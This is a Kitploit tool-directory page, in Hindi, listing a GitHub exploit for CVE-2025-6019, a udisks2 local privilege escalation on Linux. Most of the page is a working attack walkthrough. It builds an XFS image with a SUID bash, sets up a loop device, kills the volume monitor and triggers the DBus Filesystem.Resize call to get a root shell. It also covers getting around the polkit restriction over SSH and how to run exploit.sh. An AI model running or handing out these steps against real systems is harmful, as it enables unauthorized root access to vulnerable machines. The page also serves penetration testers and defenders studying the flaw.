Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6019-exploit — एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/and-oss/cve-2025-6019-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHuband-oss/cve-2025-6019-exploit

CVE-2025-6019-exploit

एक्सप्लॉइट

रिपॉजिटरी देखें
431 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-6019: UDisks2 फ़ाइलसिस्टम आकार परिवर्तन के माध्यम से विशेषाधिकार वृद्धि शोषण

भेद्यता विवरण

  • CVE आईडी: CVE-2025-6019
  • प्रभाव: स्थानीय विशेषाधिकार वृद्धि (LPE)
  • प्रभावित सिस्टम: कमजोर udisks2 संस्करणों वाले लिनक्स सिस्टम
  • तंत्र: फ़ाइलसिस्टम आकार परिवर्तन के दौरान रेस कंडीशन विश्व-लेखन योग्य अस्थायी निर्देशिकाओं में SUID बाइनरी तक पहुंच की अनुमति देता है
  • मुख्य घटक:
    • udisks2 सेवा (DBus इंटरफ़ेस)
    • org.freedesktop.UDisks2.Filesystem.Resize विधि
    • /tmp/blockdev* के अंतर्गत अस्थायी माउंट पॉइंट

शोषण कार्यप्रवाह

1. दुर्भावनापूर्ण फ़ाइलसिस्टम इमेज तैयार करें (हमलावर)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash  # Set SUID bit
umount ./xfs.mount 

2. शोषण ट्रिगर करें (पीड़ित मशीन)

root@kitploit:~
# सिस्टम क्षमताएं सत्यापित करें
gdbus call --system --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot

# इंटरफ़ेरेंस हटाएं
killall -KILL gvfs-udisks2-volume-monitor

# लूप डिवाइस सेटअप करें
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# पृष्ठभूमि वॉचर (जब SUID बाइनरी दिखाई दे तो निष्पादित होता है)
while true; do 
  /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &

# DBus के माध्यम से भेद्यता ट्रिगर करें
gdbus call --system --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

3. रूट एक्सेस प्राप्त करें

root@kitploit:~
/tmp/blockdev*/bash -p  # प्रिविलेज्ड शेल लॉन्च करें
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)

महत्वपूर्ण!

शोषण केवल logind सत्र में काम करता है!

  • स्क्रिप्ट को logind सत्र से चलना चाहिए जो Active=yes और Remote=no हो (जैसे tty1).
  • जब इसे SSH / pts/* / रिवर्स-शेल सत्र से शुरू किया जाता है, तो udisksctl loop-setup --no-user-interaction कॉल polkit द्वारा अस्वीकार कर दिया जाता है, इसलिए PoC “Failed to create loop device” के साथ बाहर निकल जाता है।

नोटिस:

  • यदि आप SSH के माध्यम से शोषण का उपयोग करना चाहते हैं, तो आपको अस्थायी polkit नियम हटाना होगा

शोषण का उपयोग कैसे करें

suid इमेज बनाएं

root@kitploit:~
$ sudo bash exploit.sh create 

सिस्टम का शोषण करें

root@kitploit:~
$ bash exploit.sh exploit 

POC वीडियो

poc

टूल डाउनलोड करें